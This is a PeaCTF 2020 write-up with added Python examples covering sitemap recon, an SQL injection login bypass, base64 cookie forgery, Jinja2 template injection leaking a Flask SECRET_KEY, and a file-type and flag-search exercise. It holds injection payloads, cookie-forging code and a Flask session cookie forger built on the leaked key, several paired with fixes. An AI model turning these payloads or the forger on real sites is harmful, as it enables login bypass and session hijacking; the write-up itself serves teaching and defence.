PeaCTF 2020: Write up
Web Exploitation
Eff-twelve
Just view the page source; the flag sits in an HTML comment:
<!--FLAG: peaCTF{b3a96a5c-71df-455d-8035-0df702546173}-->
Bots
Requesting /robots.txt returns:
User-agent: *
Sitemap: /sitemap.xml
Requesting /sitemap.xml returns:
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <url>
    <loc>/index.html</loc>
    <lastmod>2019-04-10T09:51:57+06:00</lastmod>
  </url>
  <url>
    <loc>/97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html</loc>
    <lastmod>2019-04-10T09:51:57+06:00</lastmod>
  </url>
</urlset>
Requesting /97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html gives the flag. robots.txt and sitemaps are public by design, so listing a page there hides nothing: an unguessable file name is not access control.
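The two fetches above are the standard first recon step, so here it is automated: parse robots.txt for Sitemap and Disallow directives, parse the sitemap (both <urlset> and <sitemapindex>), and flag the entries that look like "hidden" pages. This is an added example, not part of the writeup; the host target.example is a placeholder, and the embedded robots.txt and sitemap.xml bodies are the responses shown above, copied in so the code runs offline.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urljoin

# Constructed sample inputs: the two responses shown above, embedded so the
# example runs offline. BASE is a placeholder host, not the challenge's.
BASE = "http://target.example/"
ROBOTS_TXT = "User-agent: *\nSitemap: /sitemap.xml\n"
SITEMAP_XML = (
    '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" '
    'xmlns:xhtml="http://www.w3.org/1999/xhtml">'
    "<url><loc>/index.html</loc><lastmod>2019-04-10T09:51:57+06:00</lastmod></url>"
    "<url><loc>/97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html</loc>"
    "<lastmod>2019-04-10T09:51:57+06:00</lastmod></url>"
    "</urlset>"
)
SM_NS = "{http://www.sitemaps.org/schemas/sitemap/0.9}"


def robots_hints(robots_txt, base):
    """Pull the two recon-relevant directives out of robots.txt.

    Returns (sitemaps, disallowed): absolute sitemap URLs and raw Disallow paths.
    Directive names are matched case-insensitively and '#' comments are
    stripped, which is how crawlers read the file.
    """
    sitemaps, disallowed = [], []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(?i)(sitemap|disallow)\s*:\s*(\S*)", line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2)
        if key == "sitemap" and val:
            sitemaps.append(urljoin(base, val))
        elif key == "disallow" and val:
            disallowed.append(val)
    return sitemaps, disallowed


def sitemap_entries(xml_text, base):
    """Return (is_index, urls) for a sitemap document.

    A <sitemapindex> lists further sitemaps to fetch; a <urlset> lists pages.
    Both carry their targets in <loc>, so one namespace-aware iter() serves both.
    """
    root = ET.fromstring(xml_text)
    is_index = root.tag == SM_NS + "sitemapindex"
    urls = [urljoin(base, loc.text.strip())
            for loc in root.iter(SM_NS + "loc") if loc.text]
    return is_index, urls


def looks_unlinked(url, min_token=20):
    """Triage heuristic: a final path segment that is one long alphanumeric token
    is the kind of 'secret' page that ends up in a sitemap by mistake."""
    last = url.rstrip("/").rsplit("/", 1)[-1].rsplit(".", 1)[0]
    return len(last) >= min_token and last.isalnum()
```

In practice you feed robots_hints() the live response, fetch every sitemap it names, recurse when sitemap_entries() reports an index, and request everything looks_unlinked() flags first.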
Secure Admin
POSTing
username='+OR+1=1#&password='
(username ' OR 1=1#, password a lone quote) returns:
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Sat, 24 Oct 2020 11:34:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.0RC6
Content-Length: 81

Login success. Welcome! Your flag is peaCTF{2be8b136-325a-40ff-a6b3-6cb1dba72c96}
The closing quote ends the username literal, OR 1=1 makes the WHERE clause true for every row, and # starts a MySQL line comment that discards whatever the query appends after it (the password check). Classic string-concatenated SQL.
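Here is the bug and the fix side by side, as an added example that is not part of the writeup: a constructed users table in SQLite, a login that concatenates input into the SQL text, and the same login with bound parameters. Note that the challenge payload's # is MySQL comment syntax; SQLite only understands "-- ", so the example carries both variants plus a comment-free one that works on either engine.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for the challenge's unknown schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'hunter2-but-longer')")
    return db


def login_vulnerable(db, username, password):
    """The bug: user input is spliced into the SQL text, so quotes and
    comment markers in the input become SQL syntax."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """The fix: parameter binding. Values travel separately from the statement,
    so a quote in the input is just a character inside a string."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Each payload turns the WHERE clause into  username='' OR 1=1 <rest ignored>
PAYLOADS = {
    "mysql":  ("' OR 1=1#", "'"),            # what the writeup sent; '#' is MySQL-only
    "sqlite": ("' OR 1=1-- ", "'"),          # same idea with the SQLite/ANSI comment
    "any":    ("' OR '1'='1", "' OR '1'='1"),  # no comment needed; AND binds tighter than OR
}


def demo(engine="sqlite"):
    """Return (vulnerable_result, fixed_result) for a payload. A syntax error
    from the vulnerable path is itself informative: it fingerprints the backend."""
    db = make_db()
    user, pw = PAYLOADS[engine]
    try:
        vuln = login_vulnerable(db, user, pw)
    except sqlite3.OperationalError as exc:
        vuln = "error: %s" % exc
    return vuln, login_fixed(db, user, pw)
```

demo("sqlite") and demo("any") both log in as admin through the vulnerable path and fail through the fixed one; demo("mysql") shows the # payload failing to parse on SQLite, which is exactly the kind of error message that tells a tester which database is behind the form.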
Secure Admin 2
The login request looks like this:
POST /login.php HTTP/1.1
Host: 45.32.128.108:28064
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://45.32.128.108:28064
Connection: close
Referer: http://45.32.128.108:28064/
Cookie: _auth=WVdSdGFXNDZabUZzYzJVPQ==
Upgrade-Insecure-Requests: 1

username=admin&password=admin
The _auth cookie value is base64 and looks suspicious. Decoding it twice:
$ echo -n 'WVdSdGFXNDZabUZzYzJVPQ==' | base64 -d | base64 -d
admin:false
So encode admin:true the same way:
$ echo -n 'admin:true' | base64 | base64
WVdSdGFXNDZkSEoxWlE9PQo=
and resend the POST with that cookie value. (The first base64 in the pipeline appends a newline, which is why the result ends in PQo= rather than PQ==; the server evidently tolerates it.) Encoding is not authentication: anything the client can decode it can re-encode, so a privilege flag in a cookie needs at least a server-side MAC, and better, should not be client-controlled at all.
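The same decode and forge in Python, followed by the minimum fix (an HMAC tag over the payload) and the attacker's move against it, as an added example that is not part of the writeup. SERVER_KEY is a placeholder generated per process; the cookie values are the ones shown above.

```python
import base64
import hashlib
import hmac
import secrets


def decode_auth(cookie):
    """Undo the challenge's double base64 and split the 'user:flag' payload.
    b64decode() ignores stray newlines, so both the original cookie and the
    writeup's newline-tainted forgery decode cleanly."""
    raw = base64.b64decode(base64.b64decode(cookie))
    user, _, flag = raw.decode().strip().partition(":")
    return user, flag == "true"


def forge_auth(user, is_admin):
    """Re-encode a chosen payload the way the app does (no trailing newline,
    unlike the shell pipeline above)."""
    payload = "%s:%s" % (user, "true" if is_admin else "false")
    return base64.b64encode(base64.b64encode(payload.encode())).decode()


# --- what the cookie should have looked like: payload plus an HMAC tag -------
SERVER_KEY = secrets.token_bytes(32)   # placeholder; a real app keeps this in config


def sign_auth(user, is_admin, key=SERVER_KEY):
    payload = ("%s:%s" % (user, "true" if is_admin else "false")).encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return "%s.%s" % (base64.urlsafe_b64encode(payload).decode(),
                      base64.urlsafe_b64encode(tag).decode())


def verify_auth(cookie, key=SERVER_KEY):
    """Return (user, is_admin) if the tag checks out, else None.
    compare_digest() keeps the comparison constant-time."""
    try:
        payload_b64, tag_b64 = cookie.split(".", 1)
        payload = base64.urlsafe_b64decode(payload_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:          # malformed cookie (binascii.Error is a ValueError)
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    user, _, flag = payload.decode(errors="replace").partition(":")
    return user, flag == "true"


def swap_payload(cookie, user, is_admin):
    """The forgery attempt against the signed scheme: new payload, old tag."""
    payload = ("%s:%s" % (user, "true" if is_admin else "false")).encode()
    return "%s.%s" % (base64.urlsafe_b64encode(payload).decode(),
                      cookie.split(".", 1)[1])
```

The MAC stops the admin:false to admin:true edit, but the role is still stored client-side; the usual fix is an opaque session id looked up server-side, so the cookie carries no claims at all.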
flaskookies
The app has a server-side template injection (SSTI) vulnerability: the name parameter is rendered as a Jinja2 template. POSTing
name={{+config+}}
dumps the Flask config object:
<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': b'\x7f:&\xcaKu\x9c\x88\x00S\xd3wC\x01"\xaa\xbf\xec8H{|9\xe7', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(seconds=43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'flag': 'peaCTF{61c3d4bc-bb7f-451a-80aa-d6bc485b6e4e}\n'}>.1
The response contains the flag. The same dump also leaks SECRET_KEY, which in a real application is the more serious disclosure: Flask signs every session cookie with it.
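To show why the SECRET_KEY leak matters, here is a stand-alone forger and verifier for Flask-style session cookies using the key from the dump above. This is an added example, not code from the writeup or from Flask: it re-implements the cookie layout as I understand it from itsdangerous 2.x (payload.timestamp.signature, urlsafe base64 without padding, HMAC-SHA1 with a key derived as HMAC(secret_key, "cookie-session"), optional zlib compression marked by a leading "."); treat that layout as an assumption and confirm against a live app before relying on byte-exact compatibility. The challenge page gave no evidence it uses sessions; the point is what a leaked key enables.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# SECRET_KEY exactly as leaked by the {{config}} dump above.
LEAKED_SECRET_KEY = b'\x7f:&\xcaKu\x9c\x88\x00S\xd3wC\x01"\xaa\xbf\xec8H{|9\xe7'
SALT = b"cookie-session"   # Flask's fixed salt for session cookies (assumption: itsdangerous 2.x layout)


def _b64(data):
    """urlsafe base64 with the '=' padding stripped, itsdangerous style."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data):
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key):
    # Flask configures itsdangerous with key_derivation="hmac" and SHA-1.
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def _sig(secret_key, value):
    return _b64(hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest())


def forge_session(secret_key, session, now=None):
    """Build a signed session cookie for an arbitrary session dict."""
    payload = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:      # same threshold itsdangerous uses
        payload_b64 = b"." + _b64(compressed)
    else:
        payload_b64 = _b64(payload)
    ts = int(now if now is not None else time.time())
    ts_b64 = _b64(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = payload_b64 + b"." + ts_b64
    return (value + b"." + _sig(secret_key, value)).decode()


def verify_session(secret_key, cookie, max_age=None, now=None):
    """Return the session dict if the signature (and age) check out, else None.
    Mirrors what the server does, so a forged cookie that passes here is one
    the server would accept under the assumed layout."""
    cookie = cookie.encode()
    try:
        value, sig = cookie.rsplit(b".", 1)
        if not hmac.compare_digest(sig, _sig(secret_key, value)):
            return None
        payload_b64, ts_b64 = value.rsplit(b".", 1)
        ts = int.from_bytes(_unb64(ts_b64), "big")
        current = now if now is not None else time.time()
        if max_age is not None and current - ts > max_age:
            return None
        if payload_b64.startswith(b"."):
            payload = zlib.decompress(_unb64(payload_b64[1:]))
        else:
            payload = _unb64(payload_b64)
        return json.loads(payload)
    except (ValueError, zlib.error):
        return None
```

With the key in hand, forge_session(LEAKED_SECRET_KEY, {"user": "admin"}) yields a cookie the verifier accepts; rotating SECRET_KEY invalidates every outstanding session, which is the response to a leak like this one.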
Misc
Corrupt
$ file filetype.txt
filetype.txt: PNG image data, 848 x 242, 8-bit/color RGBA, non-interlaced
$ mv filetype.txt filetype.png
file identifies the format from the magic bytes, not the extension; once renamed, an image viewer opens it normally.
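The same check in code, as an added example that is not part of the writeup: sniff a few common signatures, and for PNG go one step further than file's first line by parsing the IHDR chunk and verifying its CRC, which is how you tell a mislabeled-but-intact image from a truncated or corrupted one. The sample bytes are constructed in-line (a PNG signature plus a valid IHDR with the 848 x 242 RGBA geometry file reported above; no pixel data).

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Leading-byte signatures `file` keys on for a few common formats.
MAGIC = {
    PNG_SIG: "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",
}

COLOR_TYPES = {0: "grayscale", 2: "RGB", 3: "palette", 4: "gray+alpha", 6: "RGBA"}


def sniff_extension(data):
    """Return the extension implied by the leading bytes, or None."""
    for sig, ext in MAGIC.items():
        if data.startswith(sig):
            return ext
    return None


def png_info(data):
    """Parse the PNG signature and IHDR chunk; verify the IHDR CRC.
    Raises ValueError on anything that is not a well-formed PNG header."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG (bad signature)")
    if len(data) < 33:
        raise ValueError("truncated before end of IHDR")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk must be IHDR of length 13")
    body = data[16:29]
    (crc,) = struct.unpack(">I", data[29:33])
    if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:   # CRC covers type + data, not length
        raise ValueError("IHDR CRC mismatch")
    width, height, depth, color, _comp, _filt, interlace = struct.unpack(">IIBBBBB", body)
    return {
        "width": width,
        "height": height,
        "bit_depth": depth,
        "color_type": COLOR_TYPES.get(color, color),
        "interlaced": interlace == 1,
    }


def is_valid_png_header(data):
    try:
        png_info(data)
        return True
    except ValueError:
        return False


def build_png_header(width, height, bit_depth=8, color_type=6):
    """Constructed sample: signature + a valid IHDR chunk, no image data."""
    body = struct.pack(">IIBBBBB", width, height, bit_depth, color_type, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + body + struct.pack(">I", crc)


# The geometry `file` reported for filetype.txt.
SAMPLE = build_png_header(848, 242)
```

A file that passes sniff_extension() but fails png_info() is the interesting case in a "corrupt" challenge: the header was kept but something after the signature was damaged.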
General Skills
Warm-up 0
$ ssh peactf@45.32.128.108 -p28058
to connect over ssh.
Poking around with a few commands turned up the flag:
peactf@24414320bbe0:~/warm-up-1$ cat */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*
cat: 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: Is a directory
peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}
cat: 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: Is a directory
peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}
cat: f5ad680e0142e8f0834325b61feceee7/55ac7c6cad407189c37d25f0d31c4af0/66ee00647434e499e11532be9f7225a4/87970f657f63eb2624b5a149b4d4c99f/d338cf937923618f103ce9d0186da1a0/2b2d393c32bef3ca9461ac6edd279289/4d7d7ee378382a2164ab5168826a002e/6e670f25e01baf7f56868130e131bf25/4edfdd8562c59422dcd2a4b3cc6e3f2c/4cdc6806225fbd266ca5d6da20750ba1/31d58b08c604c14c85814e05fb9c6749/50e578a9617796d83b1b906d61614e7b/5ee0983bc96ebe70d50f8854239e2b51/d6a068548992e87131c4e40f6493f68b/469f14ab42d8f92f8b31eef0c8a2f28c/77882f6d68ccf3f257fb3c0784e8e238/94afaa03edbf1347aca0afba2186579f/33746a4bdfcfe234658b33e910576c27/4e516ed4e7771bfadc06bf3aa7ef704e/fcc1742a517e2d32f16a3f25852c2dbf: Is a directory
The glob matches directories as well as files at that depth, hence the "Is a directory" errors; the flag files themselves have no trailing newline, which is why the copies run together.
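The glob approach only works when you guess the depth right. A recursive walk that reads regular files only and extracts anything matching the CTF's flag format is the general version; this is an added example, not part of the writeup. It builds its own constructed directory tree (twenty nested levels, decoy files along the way, one flag file at the bottom) so it runs stand-alone.

```python
import os
import re
import tempfile

# Flag format used throughout this CTF: peaCTF{<uuid>}.
FLAG_RE = re.compile(rb"peaCTF\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}")


def find_flags(root, max_bytes=1 << 20):
    """Walk root recursively and return sorted unique flags found in regular files.

    Directories and symlinks are skipped (no 'Is a directory' noise), unreadable
    files are ignored, and only the first max_bytes of each file are scanned so a
    stray large file cannot stall the search.
    """
    found = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            try:
                with open(path, "rb") as fh:
                    found.update(FLAG_RE.findall(fh.read(max_bytes)))
            except OSError:
                continue
    return sorted(m.decode() for m in found)


def make_nested_tree(depth=20, with_flag=True):
    """Constructed sample tree in a temp dir: `depth` nested directories, a decoy
    notes.txt at every level, and (optionally) a flag file at the bottom."""
    root = tempfile.mkdtemp(prefix="warmup-")
    cur = root
    for i in range(depth):
        cur = os.path.join(cur, "d%02d" % i)
        os.mkdir(cur)
        with open(os.path.join(cur, "notes.txt"), "w") as fh:
            fh.write("nothing here\n")
    if with_flag:
        with open(os.path.join(cur, "flag.txt"), "w") as fh:
            fh.write("peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}")   # no trailing newline, like the real one
    return root
```

On the shell side the equivalent is find . -type f -exec grep -ao 'peaCTF{[^}]*}' {} +, which likewise never hands a directory to the reader.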